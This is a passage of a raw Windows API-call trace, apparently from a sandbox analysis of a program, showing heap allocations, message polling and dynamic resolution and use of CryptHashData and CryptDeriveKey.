dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0234.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0234.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0234.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0234.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0234.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0234.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0234.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0234.974] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0234.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0234.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0234.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0234.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0234.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0234.975] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0234.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0234.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51250 [0234.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0234.975] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0234.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0234.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0234.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0234.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0234.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0234.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0234.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0234.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0234.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0234.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0234.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0234.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0234.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0234.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0234.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0234.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0234.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0234.976] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0234.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0234.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e515b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0234.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0234.976] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0234.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0234.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.976] CryptHashData (hHash=0xa87310, pbData=0x2e55088, dwDataLen=0x3, dwFlags=0x1) returned 1 [0234.983] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.983] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0234.983] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.983] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0234.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0234.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51388 [0234.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0234.983] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0234.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0234.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0234.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0234.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0234.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0234.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0234.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0234.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0234.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0234.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0234.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0234.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0234.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0234.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0234.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0234.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0234.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0234.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0234.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0234.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0234.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0234.984] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0234.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0234.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0234.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51358 [0234.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0234.984] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0234.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0234.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0234.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0234.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0234.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0234.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0234.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0234.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0234.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0234.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0234.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0234.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0234.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0234.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0234.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0234.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0234.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0234.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0234.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0234.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0234.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0234.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0234.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0234.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0234.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0234.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0234.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0234.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0234.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0234.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0234.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0234.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0234.986] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0234.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0234.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0234.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0234.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0234.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0234.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0234.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0234.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0234.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0234.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0234.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0234.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0234.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0234.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0234.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0234.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0234.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0234.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0234.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0234.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0234.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0234.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0234.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0234.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0234.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0234.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0234.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0234.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0234.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0234.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0234.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0234.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0234.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0234.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0234.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0234.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0234.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0234.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0234.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0234.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0234.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0234.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0234.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0234.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0234.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0234.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0234.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0234.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0234.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0234.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0234.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0234.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0234.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0234.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0234.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0234.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0234.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0234.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51568 [0234.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51568, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0234.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0234.988] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0234.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0234.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0234.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0234.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0234.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0234.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0234.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0234.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0234.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0234.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0234.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0234.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0234.989] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87310, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa872d0) returned 1 [0234.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0234.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0234.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0234.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0234.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0234.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0234.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0234.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0234.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0234.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0234.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0234.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0234.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0234.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0234.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0234.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0234.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0234.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0234.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0234.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0234.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0234.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0234.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0234.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0234.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0234.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0234.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0234.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0234.990] RtlAllocateHeap (HeapHandle=0x970000, 